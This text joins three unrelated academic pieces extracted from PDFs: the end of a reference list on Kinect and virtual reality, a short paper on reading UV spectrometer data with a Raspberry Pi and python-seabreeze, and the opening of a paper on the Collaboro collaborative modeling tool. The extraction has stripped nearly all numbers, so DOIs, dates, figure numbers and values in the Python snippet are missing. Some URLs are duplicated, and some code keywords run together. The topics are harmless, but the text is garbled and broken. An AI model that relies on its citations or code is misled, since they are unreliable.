/j.egypro. . . . microsoft. a. ms kinect v technical specifications. available at https://msdn. microsoft.com/en-us/library/jj .aspx (accessed on may ). microsoft. b. ms kinect v technical specifications. available at https://developer. microsoft.com/en-us/windows/kinect/hardware (accessed on may ). mills s. . virtual reality—user issues. in: iee colloquium on virtual reality—user issues. london: iee, – doi . /ic: . macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /srep http://dx.doi.org/ . /idaacs. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.measurement. . . http://dx.doi.org/ . /vr. . https://developer.leapmotion.com/documentation/csharp/devguide/leap_overview.html https://developer.leapmotion.com/documentation/csharp/devguide/leap_overview.html http://dx.doi.org/ . /haptic. . http://dx.doi.org/ . /vr. . http://dx.doi.org/ . /j.egypro. . . https://msdn.microsoft.com/en-us/library/jj .aspx https://msdn.microsoft.com/en-us/library/jj .aspx https://developer.microsoft.com/en-us/windows/kinect/hardware https://developer.microsoft.com/en-us/windows/kinect/hardware http://dx.doi.org/ . /ic: http://dx.doi.org/ . /peerj-cs. morel m, bideau b, lardy j, kulpa r. . advantages and limitations of virtual reality for balance assessment and rehabilitation. clinical neurophysiology ( – ): – doi . /j.neucli. . . . notzon s, deppermann s, fallgatter a, diemer j, kroczek a, domschke k, zwanzger p, ehlis ac. . psychophysiological effects of an itbs modulated virtual reality challenge including participants with spider phobia. biological psychology : – doi . /j.biopsycho. . . . otaduy ma, okamura a, subramanian s. . haptic technologies for direct touch in virtual reality. in: acm siggraph courses, siggraph’ . new york: acm, : – : . otte k, kayser b, mansow-model s, verrel j, paul f, brandt au, schmitz-hubsch t. . accuracy and reliability of the kinect version for clinical measurement of motor function. plos one ( ): – doi . /journal.pone. . paolini g, peruzzi a, mirelman a, cereatti a, gaukrodger s, hausdorff j, della croce u. . validation of a method for real time foot position and orientation tracking with microsoft kinect technology for use in virtual reality and treadmill based gait training programs. ieee transactions on neural systems and rehabilitation engineering (c): – . park sy, kim sm, roh s, soh m-a, lee sh, kim h, lee ys, han dh. . the effects of a virtual reality treatment program for online gaming addiction. computer methods and programs in biomedicine : – doi . /j.cmpb. . . . peek b. . connecting to the kinect remotely with the kinect service. available at https://channel .msdn.com/coding fun/kinect/connecting-to-the-kinect-remotely- with-the-kinect-service (accessed on june ). playstation vr. . ps vr in detail technical specifications. available at https://www. playstation.com/en-au/explore/playstation-vr/tech-specs/ (accessed on june ). point cloud library. . removing outliers using a statisticaloutlierremoval filter. available at http://pointclouds.org/documentation/tutorials/statistical_outlier.php (accessed on september ). portman me, natapov a, fisher-gewirtzman d. . to go where no man has gone before: virtual reality in architecture, landscape architecture and envi- ronmental planning. computers, environment and urban systems : – doi . /j.compenvurbsys. . . . prothero j, hoffman h. . widening the field of view increases the sense of presence within immersive virtual environments. human interface technology laboratory tech. rep. university of washington. remondino f. . from point cloud to surface: the modeling and visualization problem. international archives of photogrammetry, remote sensing and spatial information sciences xxxiv: – . rudinskiy m, bula m, stahl t, davies n, fitzgerald m, d’andrea s, gielo-perczak k. . dual actuated gait rehabilitation treadmill implementing virtual reality and visual postural feedback. in: th annual northeast bioengineering conference (nebec). piscataway: ieee, – . macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.neucli. . . http://dx.doi.org/ . /j.biopsycho. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.cmpb. . . https://channel .msdn.com/coding fun/kinect/connecting-to-the-kinect-remotely-with-the-kinect-service https://channel .msdn.com/coding fun/kinect/connecting-to-the-kinect-remotely-with-the-kinect-service https://www.playstation.com/en-au/explore/playstation-vr/tech-specs/ https://www.playstation.com/en-au/explore/playstation-vr/tech-specs/ http://pointclouds.org/documentation/tutorials/statistical_outlier.php http://dx.doi.org/ . /j.compenvurbsys. . . http://dx.doi.org/ . /peerj-cs. rusu rb, cousins s. . d is here: point cloud library (pcl). in: robotics and automa- tion (icra), ieee international conference on. piscataway: ieee, – . schall o, belyaev a, seidel h-p. . robust filtering of noisy scattered point data. in: proceedings eurographics/ieee vgtc symposium point-based graphics, . piscataway: ieee. scheidegger ce, fleishman s, silva ct. . triangulating point set surfaces with bounded error. in: desbru m, pottmann h, eds. eurographics symposium on geometry processing . the eurographics association. shokur s, gallo s, moioli rc, donati a. rc, morya e, bleuler h, nicolelis m. al. . assimilation of virtual legs and perception of floor texture by complete paraplegic patients receiving artificial tactile feedback. scientific reports :article doi . /srep . stavroulia ke, ruiz-harisiou a, manouchou e, georgiou k, sella f, lanitis a. . a d virtual environment for training teachers to identify bullying. in: proceedings of the th mediterranean electrotechnical conference: intelligent and efficient technologies and services for the citizen, melecon , april. – . weichert f, bachmann d, rudak b, fisseler d. . analysis of the accuracy and robustness of the leap motion controller. sensors ( ): – doi . /s . woodard w, sukittanon s. . interactive virtual building walkthrough using oculus rift and microsoft kinect. in: southeastcon . piscataway: ieee, – . wrzesien m, rodríguez a, rey b, alcañiz m, baños rm, vara md. . how the physical similarity of avatars can influence the learning of emotion reg- ulation strategies in teenagers. computers in human behavior : – doi . /j.chb. . . . zhao w, espy dd, reinthal ma, feng h. . a feasibility study of using a single kinect sensor for rehabilitation exercises monitoring: a rule based approach. in: ieee symposium on computational intelligence in healthcare and e-health (cicare). piscataway: ieee, – . zheng j, chan k, gibson i. . virtual reality. ieee potentials ( ): – doi . / . . macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /srep http://dx.doi.org/ . /s http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - readings of portable uv spectrum analyzer data based on raspberry pi xu shuping school of computer science and engineering xi’an technological university xi’an, , china e-mail:xusp @ .com huang mengyao, xu pei school of computer science and engineering xi’an technological university xi’an, , china abstract—most of the spectrometer has the advantages of large volume, inconvenient carrying, slow data reading, long development cycle and high cost. in view of this situation, this paper presents a raspberry based portable spectrum analyzer. the general structure, working principle and data reading principle of the portable ultraviolet spectrum analyzer system based on raspberry faction are introduced in detail. and the raspberry sent a brief introduction, and finally introduced the raspberry pie to the development of the environment configuration, and the use of python-qt prepared control software for data read. the final test shows that the system interface is simple and friendly, stable operation, you can quickly read the data from the spectrometer, to meet the actual requirements. keywords-spectrometer; raspberry pi; working principle; data reading i. introduction the micro-spectrometer has advantages of modular structure and flexible construction, so inpractice, only a spectrometer is needed, and the software can detect different samples in realtime [ ]. at the same time, the micro-spectrometer has advantages of small size, easy to carry, compact internal structure, wide wavelength range, fast detection speed and low price. it has wide application development space in the field of industrial online monitoring and portable detection [ ]. at present, the portable spectrometer in domestic and foreign market has two main methods: electrochemical analysis and infrared spectrometry[ ]. the electrochemical analysis method has the advantages of simple structure and easy operation. it mainly depends on the gas sensor, and a gas sensor can only detect a corresponding gas, and the gas sensor also has a life limit, the use of a period of time, the sensitivity of the gas will be reduced, the need to replace gas sensors, and gas sensors are expensive, increasing the cost of use for the user. the main principle of the gas sensor is the use of gas oxidation or reduction reaction, the current, but if both the presence of oxidizing gas and reducing gas, the measurement results will be inaccurate [ ]. infrared spectroscopy overcomes the shortcomings of electrochemical analysis, but it can only measure the approximate concentration of nox, and it cannot accurately measure the specific concentration of no and no , and the infrared spectral analysis method is more complicated than the environment humidity, temperature, etc [ ]. based on the above problems, this paper presents a portable uv spectrometer developed using maya pro uv spectrometer and raspberry pi, according to the uv light wavelength nm- nm, the gas has good absorption of ultraviolet light, and the measurement is absorbed by the gas, after the uv light, which can read through the spectrometer wavelength and photon number. the ultraviolet spectral analysis has the advantages of high reliability, strong anti-interference, and a variety of gases can be measured at the same time, accurate measurement and so on. the portable spectrometer has the advantages of fast data reading speed, low cost, convenient on-line debugging, stable operation and simple operation, and achieves practical requirements. mailto:xusp @ .com international journal of advanced network, monitoring and controls volume , no. , ii. system architecture the portable uv spectrometer’s system architecture as shown in fig. , and system consists of three modules: data acquisition module, data processing module and man-machine interaction module. the data acquisition module is composed of sampling probe, flue gas sampling pump, ultraviolet light source and micro spectrum analyzer, and the main purpose is to complete the collection of gas, analyze the spectral data before and after the ultraviolet light source and micro-spectrometer, and transform the spectral data into digital signal to transmit to the data processing module. in fact, in the whole system, the micro-spectrometer is a very important sensor component, and the spectrometer is mainly composed of optical components, photoelectric conversion module (ccd), memory. the optical components are mainly for optical fiber incoming optical signal processing, photoelectric conversion module (ccd) after the optical processing of ultraviolet light into electrical signals, memory used to store electrical signals [ ]. at the core of the data center is the raspberry pi development board, then the task is to calculate the specific concentration of gases in the mixed gas by using the relevant algorithm. the man-machine interaction module is composed of a keyboard and an lcd screen, which is designed to visualize the concentration of gas and other related settings on line monitoring. figure . the overall architecture of the portable spectrometer the key component of the portable uv spectrum analyzer control and data processing is the raspberry pi development board. it is a micro-computer motherboard based on arm (shown in fig. ), and the board contains an arm cortex a microprocessor, then the main frequency is . ghz. it provides a m/ m ethernet socket and four usb connectors, uses a normal sd card as a hard drive, supports c, c++, python and other development languages. the above parts are integrated in a motherboard, with the basic functions of ordinary computers, compared with the traditional embedded development platform such as arm , arm , raspberry pi in the development efficiency, operation speed, market price and so on have obvious advantages. figure . raspberry pi b development board iii. data acquisition and reading principle of spectrometer a. principle of data acquisition the data acquisition of portable uv spectrometer is a process of collecting frames. when the spectrometer has collected a frame of data, will collect the spectral data into a queue, waiting for the raspberry pi sent instructions to read, and the raspberry pi reading spectral data is the process of usb or serial communication. the data read from the spectrometer is derived from the photoelectric conversion (ccd) module. the photoelectric conversion module used in the maya pro series spectrometer is a thin photoelectric conversion (ccd) array on the back of the science level. international journal of advanced network, monitoring and controls volume , no. , figure . data reading sequence diagram of spectrometer the data reading sequence of uv spectrometer is shown in figure . the spectrometer first receives the external triggering signal (high level, ns), at the same time, starts triggering the delay signal (low level), resets the ccd signal (low level signal), integration time signal (high level), and the data reads the signal (low level), idle time signal (low level), after receiving the external trigger signal again, then a data acquisition process is over, and the collected data is stored in memory. b. principle of data reading figure . schematic diagram of data reading of spectrometer international journal of advanced network, monitoring and controls volume , no. , one of the most important components of the uv spectrometer is the high-speed single-chip microcomputer. high-speed single-chip computer has a usb port (square port, usb . , mini b-type -pin) and serial port two interface (serial port for the -pin ocean spectrometer special interface) [ ]. the data reading process and principle of uv spectrometer are as follows: first, the optical components of the ultraviolet light processing, ultraviolet light through the slit to the collimating mirror, after collimation, the grating is assembled onto the ccd after the grating is divided, and the photons with different wavelengths will hit the different ccd pixels after the light is divided, and then the ccd element converts the ultraviolet signal into the electrical signal. this completes the spectrometer and the detection function. the signal information obtained from the data will be stored in the memory, then, the raspberry pi is connected with the spectrometer through a usb port, and the raspberry and spectrometer communicate with each other through the usb interface. finally, the raspberry sent to the spectrometer internal high-speed microcontroller to send instructions, and high-speed scm will be based on instructions, from the memory to obtain relevant information, and return the information to the raspberry pi. iv. raspberry pie development environment configuration and software programming a. python-seabreeze package working principle figure . how python reads the data development package works the python-seabreeze package is a two-time development package developed by the python language on the spectrometer and is the easiest way to access the maya pro-type ultraviolet spectrum analyzer in python language. it communicates with the spectrometer using the seabreeze library provided by ocean optics. any command sent by the raspberry pie to the ultraviolet spectrometer will use and rely on the seabreeze library. python-seabreeze is available as a prebuilt package on windows, linux, macos platforms in python . .x, . .x, . .x, and more. the package supports communication through the cseabreeze backend with the maya pro series ultraviolet spectrometer. in figure , the libseabreeze is a c + + language library ported from the seabreeze . api. the back end is packaged for the seabreeze library and uses the ocean optics open source seabreeze . api (using the "seabreezeapi.h") interface. almost all commands, such as the format command for communication with the spectrometer, are completed in the c/s library. as shown in figure , the python language reads the data of the ultraviolet spectrum spectrometer through the python programming interface provided by python-seabreeze, and invokes cseabreeze to read data from the ultraviolet spectrometer through the libseabreeze library. b. raspberry pidevelopment environment configuration (raspberry pi development board configuration environment must be networked) international journal of advanced network, monitoring and controls volume , no. , ) install the python environment on linux the typical linux system has a python environment and is already configured. if not, you will install it by yourself. python . is used in this article. ) install python-seabreeze package method one: in the linux terminal command window input command (raspberry pie must be networked, python-seabreeze installation process is longer, please wait patiently): conda install-c poehlmann python-seabreeze, the raspberry pie will then download the python-seabreeze and install the configuration automatically. method two: download the python-seabreeze installation package from the internet, then copy the installation package to the installation directory, execute the python setup.py command in the command box, and install the configuration automatically. after completion of . . and . . , the installation environment is configured. because of the use of raspberry pie, so here is the recommended installation berryconda - . . -linux-armv l,berryconda itself is a python development package, and contains a large number of scientific calculation package, easy to install third-party expansion pack (can use conda for rapid upgrade), support cross-platform operation, easy program migration, improve development efficiency, and this will also automatically install the modules and dependencies required for the cseabreeze backend, saving a lot of time. c. how python reads data works figure . data reading flowchart when the raspberry pie is reading the spectrometer data, it first reads the relevant information of the spectrometer equipment, and if it reads the equipment information of the spectrometer, initializes the spectrometer equipment, sets the integration time and so on; if you do not read the spectrometer device information, you will restart and read the spectrometer device information, cycle, until the device information is read. second, after the spectrometer equipment initialization completes, the software starts to read the spectral data, and the basic data which reads from the spectrometer is the light wavelength and the photon number. this completes the spectrometer equipment data reads the work. d. raspberry pie data read part of the code as follows #introduce related packages and device definitions importseabreeze. spectrometers as sb#introduction of python-seabreeze two development kits devices=sb.list_devices() #define spectrometer equipment spec=sb. spectrometer(devices[ ]) #device information printspec.serial_number #print output spectrometer factory serial number international journal of advanced network, monitoring and controls volume , no. , printspec.model #print output spectrometer model printspec.pixels #print output spectrometer number of pixels that can be read at a time #spectrometer data acquisition spec.integration_time_micros( ) #set the spectrometer integration time x=spec.wavelengths() print x #print spectrometer wavelength data y=spec.intensities() #print spectrometer photon number data #drawing images using the readout wavelength and photon number importmatplotlib.pyplot as plt plt.plot(x,y,color="green",linewidth= ) plt.xlabel("wavelengths") plt.ylabel("integration") plt.savefig("test .png",dpi= ) plt.show() the drawing results are shown in the following illustration: figure . wavelength of dark spectrum and photon number figure . wavelength of light spectrum and number of photons figures and are images drawn from the data (photon number and wavelength) that are read from the ultraviolet spectrometer. fig. is an image of the dark spectral wavelength and the number of photons, and fig. is the wavelength of the light spectrum and the number of photons (the horizontal axis is the wavelength and the longitudinal axes are photon numbers). dark spectrum, which means that without an external light source, and the spectral line caused by dark current in the ccd of ultraviolet spectrometer, when the ultraviolet spectrum is actually carried out, the number of photons measured by the detected gas needs to be reduced by the number of dark photons in order to get the actual photon number of the detected gas. it is shown from fig. that the number of dark spectral photons is about , , and the number of photons is related to the ambient temperature. e. software simulation the application is programmed with the python qt gui. after writing, then the software is simulated and tested on the raspberry pie to verify that the software function meets the design standard, and the software simulation results are shown in figure . finally, the raspberry pie and spectrometer were debugged online (fig. ). international journal of advanced network, monitoring and controls volume , no. , figure . software run interface figure . hardware and software online debugging v. conclusions this paper mainly introduces the working principle of micro ultraviolet spectrometer, data reading and so on, using the developed software after a long time test test shows: the theoretical analysis is correct, and the software has been written to achieve the raspberry pie from the micro-ultraviolet spectrometer read data, and work stable, fast, friendly interface, anti-interference ability, easy to operate and master. the system takes the raspberry pie as the core, realizes the data reading through two times development package, and carries on the software development through the python. the system has the advantages of short development cycle and stable operation, and achieves the practical goal. next, based on this, the gas iterative algorithm is studied, and the actual concentration of various gases is calculated by using an iterative algorithm for the photon number read by the raspberry pie from the ultraviolet spectrometer. vi. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shanxi province department of education ( jf ) and the project funds in shanxi province department of science industrial projects( gy ). references [ ] xu shuping, lichao. portable smoke analyzer based on arm [j]. computer measurement and control. . ( ): - [ ] lei tianxue. status of portable flue gas analyzer [j]. environmental monitoring management and technology, , ( ): . [ ] shi baosong, sun shouhong, zhang wei. application of ccd in portable spectral analyzer [j]. electronic measurement technology, ( ): - [ ] juwu ,wuyihui. micro-miniaturization of spectrometer [j].journal of instrumentation, . ( ): - [ ] yu zhiqiang, wenzhi yu, xieyingke, zhou suyi. the control system of multi-parameter water quality tester based on raspberry pie [j]. instrumentation technology and sensors, ( ): - . [ ] han xiao, wenzhi yu, xieyingke, wei kanglin, zhou xiaofeng. software design of control and signal processing system for multi-parameter water quality tester [j]. instrumentation technology and sensors, ( ): - [ ] lichao. design of a portable smoke analyzer controller based on arm [d]. xian: xi ' an university of technology, [ ] zhang yi. design of portable multifunctional flue gas analyzer [d]. xian: xi ' an university of technology, . collaboro: a collaborative (meta) modeling tool collaboro: a collaborative (meta) modeling tool javier luis cánovas izquierdo and jordi cabot , universitat oberta de catalunya (uoc), barcelona, spain institució catalana de recerca i estudis avançats (icrea), barcelona, spain abstract software development is becoming more and more collaborative, emphasizing the role of end-users in the development process to make sure the final product will satisfy customer needs. this is especially relevant when developing domain-specific modeling languages (dsmls), which are modeling languages specifically designed to carry out the tasks of a particular domain. while end-users are actually the experts of the domain for which a dsml is developed, their participation in the dsml specification process is still rather limited nowadays. in this paper, we propose a more community-aware language development process by enabling the active participation of all community members (both developers and end-users) from the very beginning. our proposal, called collaboro, is based on a dsml itself enabling the representation of change proposals during the language design and the discussion (and trace back) of possible solutions, comments and decisions arisen during the collaboration. collaboro also incorporates a metric-based recommender system to help community members to define high-quality notations for the dsmls. we also show how collaboro can be used at the model-level to facilitate the collaborative specification of software models. tool support is available both as an eclipse plug-in a web-based solution. subjects programming languages, software engineering keywords collaborative development, domain-specific languages, model-driven development introduction collaboration is key in software development, it promotes a continual validation of the software to be build (hildenbrand et al., ), thus guaranteeing that the final software will satisfy the users’ needs. furthermore, the sooner the end-users participate in the development life-cycle, the better, as several works claim (hatton & van genuchten, ; rooksby & ikeya, ; dullemond, van gameren & van solingen, ). when the software artefacts being developed target a very specific and complex domain, this collaboration makes even more sense. only the end-users have the domain knowledge required to drive the development. this is exactly the scenario we face when performing (meta) modeling tasks. on the one hand, end-users are key when defining a domain-specific modeling language (dsml), a modeling language specifically designed to perform a task in a certain domain (sánchez cuadrado & garcı́a molina, ). clearly, to be useful, the concepts and notation of a dsml should be as close as possible to the domain concepts and representation used by the end-users in their daily practice (grundy et al., ). therefore, the role of domain experts during the dsml specification is vital, as noted by how to cite this article cánovas izquierdo and cabot ( ), collaboro: a collaborative (meta) modeling tool. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted august published october corresponding author javier luis cánovas izquierdo, jcanovasi@uoc.edu academic editor marian gheorghe additional information and declarations can be found on page doi . /peerj-cs. copyright cánovas izquierdo and cabot distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:jcanovasi@�uoc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ several authors (kelly & pohjonen, ; mernik, heering & sloane, ; völter, ; bariši�c et al., ). unfortunately, nowadays, participation of end-users is still mostly restricted to the initial set of interviews to help designers analyze the domain and/or to test the language at the end (also scarcely done as reported by gabriel, goulão & amaral ( )), which requires the development of fully functional language toolsets (including a model editor, a parser, etc.) (mernik, heering & sloane, ; cho, gray & syriani, ). this long iteration cycle is a time-consuming and repetitive task that hinders the process performance (kelly & pohjonen, ) since end-users must wait until the end to see if designers correctly understood all the intricacies of the domain. on the other hand, those same end-users will then employ that modeling language (or any general-purpose (modeling) language like uml) to specify the systems to be built. collaboration here is also key in order to enable the participation of several problem experts in the process. recently, modeling tools have been increasingly enabling the collaborative development of models defined with either general-purpose languages (gpls) or dsmls. however, their support for asynchronous collaboration is still limited, specially when it comes to the traceability and justification of modeling decisions. existing project management tools such as trac (http://trac.edgewall.org/) or jira (http://www.atlassian.com/es/software/jira/overview) provide the environments required to develop collaboratively software systems. these tools enable the end-user participation during the process, thus allowing developers to receive feedback at any time (cabot & wilson, ). however, their support is usually defined at file level, meaning that discussions and change tracking are expressed in terms of lines of textual files. this is a limitation when developing or using modeling languages, where a special support to discuss at language element level (i.e., domain concepts and notation symbols) is required to address the challenges previously described and therefore promote the participation of end-users. as mentioned above, a second major problem shared by current solutions is the lack of traceability of the design decisions. the rationale behind decisions made during the language/model specification are implicit so it is not possible to understand or justify why, for instance, a certain element of the language was created with that specific syntax or given that particular type. this hampers the future evolution of the language/model. in order to alleviate these shortcomings, we define a dsml called collaboro, which enables the involvement of the community (i.e., end-users and developers) in the development of (meta) modeling tasks. it allows modeling the collaborations between community members taking place during the definition of a new dsml. collaboro supports both the collaborative definition of the abstract (i.e., metamodel) and concrete (i.e., notation) syntaxes for dsmls by providing specific constructs to enable the discussion. also, it can be easily adapted to enable the collaborative definition of models. thus, each community member has the chance to request changes, propose solutions and give an opinion (and vote) on those from others. we believe this discussion enriches the language definition and usage significantly, and ensures that the end result satisfies as much as possible the expectations of the end-users. moreover, the explicit recording of these interactions provides plenty of valuable information to explain the language evolution and justify all design decisions behind it, as also proposed in requirements cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://trac.edgewall.org/ http://www.atlassian.com/es/software/jira/overview http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ engineering (jureta, faulkner & schobbens, ). together with the collaboro dsml, we provide the tooling infrastructure and process guidance required to apply collaboro in practice. in this paper we will use the term collaboro to refer to both the dsml and the developed tooling. the first version of collaboro, which supported the collaborative development of textual dsmls in an eclipse-based environment, was presented in a previous work by (cánovas izquierdo & cabot, ). since then, the approach has evolved to include new features such as: ( ) better support for the collaborative development of graphical dsmls; ( ) a new architecture which includes a web-based front-end, thus promoting usability and participation for end-users; ( ) a metric-based recommender system, which checks the dsmls under development to spot possible issues according to quality metrics for both the domain and the notation (relying on moody’s cognitive framework (moody, )); and ( ) the development of several cases studies, which have allowed us to improve the general expressiveness and usability of our approach. additionally, in this paper we describe how our tool could be easily adapted to support collaborative modeling. paper structure. the first two sections describe the proposal and approach to develop dsml collaborative. the following section shows then how our approach could be easily adapted to use any modeling language to model collaboratively. next, the implemented tool and a case study are described. finally, we review the related work and draw some conclusions and future work. collaborative (meta) modeling while collaboration is crucial in both defining modeling languages and then using them to model concrete systems, the collaborative aspects of language development are more challenging and less studied since collaboration must cover both the definition of a new notation for the language and the specification of the language primitives themselves. therefore, we will present first collaboro in the context of collaborative language development and later its adaptation to cover the simpler modeling scenario. a running example, also introduced in this section, will help to illustrate the main concepts of such collaborations. a dsml is defined through three main components (kleppe, ): abstract syntax, concrete syntax, and semantics. the abstract syntax defines both the language concepts and their relationships, and also includes well-formedness rules constraining the models that can be created. metamodeling techniques are normally used to define the abstract syntax. the concrete syntax defines a notation (textual, graphical or hybrid) for the concepts in the abstract syntax, and a translational approach is normally used to provide semantics, though most of the time it is not explicitly formalized. the development of a dsml usually consists in five different phases (mernik, heering & sloane, ): decision, analysis, design, implementation and deployment. the first three phases are mainly focused on the dsml definition whereas the implementation phase is aimed at developing the tooling support (i.e., modeling environment, parser, etc.) for the dsml. clearly, the community around the language is a key element in the the collaborative definition of the semantics of a new dsml is out of the scope of this paper and considered as part of future work. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process. in this paper we use the term community to refer to what is known as communities of practice, which is defined as groups of people informally bound together by shared expertise and passion for a joint enterprise (tamburri, lago & vliet, ). in this case, the dsml community covers the group of people involved in its development, which includes both technical level users (i.e., language developers) and domain expert users (i.e., end-users of the language), where both categories can overlap. as a running example, imagine the development of a dsml to facilitate the planification of the baggage claim service in airports. let’s assume that the airport baggage service needs to specify every morning the full daily assignment of flights to baggage claim conveyors so that operators can know well in advance how to configure the actual baggage system. for that, developers and domain experts (i.e., baggage managers) collaborate to define a dsml that serves this purpose. typically, domain experts are only involved at the very beginning and very end of the dsml development process. assuming this is also the case for our example, during the analysis phase, developers would study the domain with the help of the baggage managers and decide that the dsml should include concepts such as flight, bag and conveyors to organize the baggage delivery. developers would design and later implement the tooling of the language, thus coming up with a textual dsml like, for instance, the one shown in fig. (both abstract and concrete syntax proposals are shown, except for the elements included in grey-filled boxes that are added later as explained in what follows). note that the concrete syntax is illustrated by means of a sample model conforming to the abstract syntax, other possible notations could be defined. once the language is developed, end-users can play with it and check whether it fits their needs. quite often, if the end-users only provided the initial input but did not closely follow how that was interpreted during the language design, they might detect problems in the dsml environment (e.g., missing concepts, wrong notation, etc.) that will trigger a new (and costly) iteration to modify the language and recreate all the associated tools. for instance, end-users could detect that the language lacks a construct to represent the capacity of conveyors, that may help them to perform a better assignment. figure abstract syntax and an example of concrete syntax of the baggage claim dsml (grey-filled boxes represent elements added after the collaboration). cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ developers can also overlook design constraints and recommendations that could improve the dsml quality. for instance, constructs in the abstract syntax not having a concrete syntax definition could become an issue (e.g., arrival attribute in flight concept). the collaboration tasks can go beyond the definition of new dsml and can cover the usage of well-known gpls, like uml. let’s imagine for instance the collaborative definition of class diagrams in order to identify the domain of a new software artefact. in fact, we could even reuse the running example to illustrate this scenario. thus, the definition of the abstract syntax of the previous dsml requires the collaborative creation of a uml class diagram. in this sense, end-users (i.e., domain experts) use a common language (i.e., uml) to create a new model required for a particular purpose (in this case, the definition of a dsml). as before, end-users can propose changes to the model, which can after be discussed and eventually accepted/rejected in the final version. our aim is to incorporate the community collaboration aspect into all dsml definition phases, making the phases of the process more participative and promoting the early detection of possible bugs or problems. as we will see, this support also enables de collaborative creation of models conforming to modeling languages. next section will present our approach. making dsml development collaborative we propose a collaborative approach to develop dsmls following the process summarized in fig. . roughly speaking, the process is as follows. once there is an agreement to create the language, developers get the requirements from the end-users to create a preliminary version of the language to kickstart the actual collaboration process (step ). this first version should include at least a partial abstract syntax but could also include a first concrete syntax draft (see dsml definition). an initial set of sample models are also defined by the developers to facilitate an example-based discussion, usually easier for non-technical users. sample models are rendered according to the current concrete syntax definition (see rendered examples). it is worth noting that the rendering is done on-the-fly without the burden of generating the dsml tooling since we are just showing the snapshots of the models to discuss the notation, not actually providing at this point a full modeling environment. now the community starts working together in order to shape the language (step ). community members can propose ideas or changes to the dsml, e.g., they can ask for modifications on how some concepts should be represented (both at the abstract and concrete syntax levels). these change proposals are shared in the community, who can also suggest and discuss how to improve the change proposals themselves. all community members can also suggest solutions for the requested changes and give their opinion on the solutions presented by others. at any time, rendering the sample models with the latest proposals helps members to have an idea of how a given proposal will evolve the language (if accepted). during this step, a recommender system (see recommender) also checks the current dsml definition to spot possible issues according to quality metrics for dsmls. if the recommender system detects possible improvements, it will cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ create new proposals to be also discussed by the community. all these proposals and solutions (see collaborations) are eventually accepted or rejected. acceptance/rejection depends on whether the community reaches an agreement regarding the proposal/solution. for that, community members can vote (step ). a decision engine (see decision engine) then takes these votes into account to calculate which collaborations are accepted/rejected by the community. the engine could follow an automatic process but a specific role of community manager could also be assigned to a member/s to consolidate the proposals and get a consensus on conflicting opinions (e.g., when there is no agreement between technical and business considerations). once an agreement is reached, the contents of the solution are incorporated into the language, thus creating a new version. the process keeps iterating until no more changes are proposed. note that these changes on the language may also have an impact on the model examples which may need to be updated to comply with the new language definition. at the end of the collaboration, the final dsml definition is used as a starting point to implement a full-fledge dsml tooling (see dsml tooling) with the confidence that it has been validated by the community (e.g., transforming/importing the dsml definition into language workbenches like xtext or graphical modeling framework (gmf)). note that even when the language does not comply with commonly applied quality patterns, developers can be sure that it at least fulfills the end-users’ needs. moreover, all aspects of the collaboration are recorded (see collaboration history), thus keeping track of every interaction and change performed in the language. thus, at any moment, this traceability information can be queried (e.g., using standard object constraint language (ocl) (object management group, a) expressions) to discover the rationale behind the elements of the language (e.g., the argumentation provided for its acceptance). to illustrate our approach, the development of the baggage claim dsml mentioned above could have been the result of the imaginary collaboration scenario depicted in fig. . after developers completed a first version of the language, the collaboration figure collaborative development of dsmls. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ begins with a community member detecting the need of expressing the capacity of the conveyors. since now we are still in the definition phase, the community has the chance to discuss the best way to adapt the language to support this new information. the member that identified the problem would create a change proposal with that aim, and if the change is deemed as important by the community, other members could propose a solution/s to adapt the language. as an example, fig. graphically depicts a possible collaboration scenario assuming a small community of one end-user and two developers. each collaboration is represented as a bubble, and each step has been numbered. in the figure, end-user proposes a language change (step ), which is accepted by the community (step ), and then developer specifies a solution (step ). the solution is rejected by end-user , including also the explanation of the rejection (step ). as the rejection is accepted (step ), the developer redefines the solution, which is eventually accepted (step ) and the changes are then incorporated into the language. the resulting changes in the abstract and concrete syntaxes are shown in grey-filled boxes in fig. . clearly, it is important to make this collaboration iterations as quick as possible and with the participation of all the community members. moreover, the discussion information itself must be preserved to justify the rationale behind each language evolution, from which design decisions can be derived. the recommender system may also participate in the collaboration and eventually improve the dsml. after checking the dsml definition, the recommender may detect that not all the attributes in the abstract syntax have a direct representation in the concrete syntax, as it happens with the arrival attribute of the flight concept (as we will explain later, this is the result of applying the metric called symbol deficit). thus, the system may create a new proposal informing about the situation and then the community could vote and eventually decide whether the dsml has to be modified. our proposal for enabling the collaborative definition of dsmls is built on top of the collaboro dsml, a dsml for modeling the collaborations that arise in a community figure example of collaboration in the baggage claim dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ working towards the development of a dsml for that community. in the next sections, we will describe how collaboro makes the collaboration feasible by: � enabling the discussion about dsml elements, � providing the metaclasses for representing collaborations and giving support to the decision-making process, � providing a metric-based recommender that can help to develop high-quality dsmls. representing the elements of a dsml to be able to discuss about changes on the dsml to-be, we must be able to represent both its 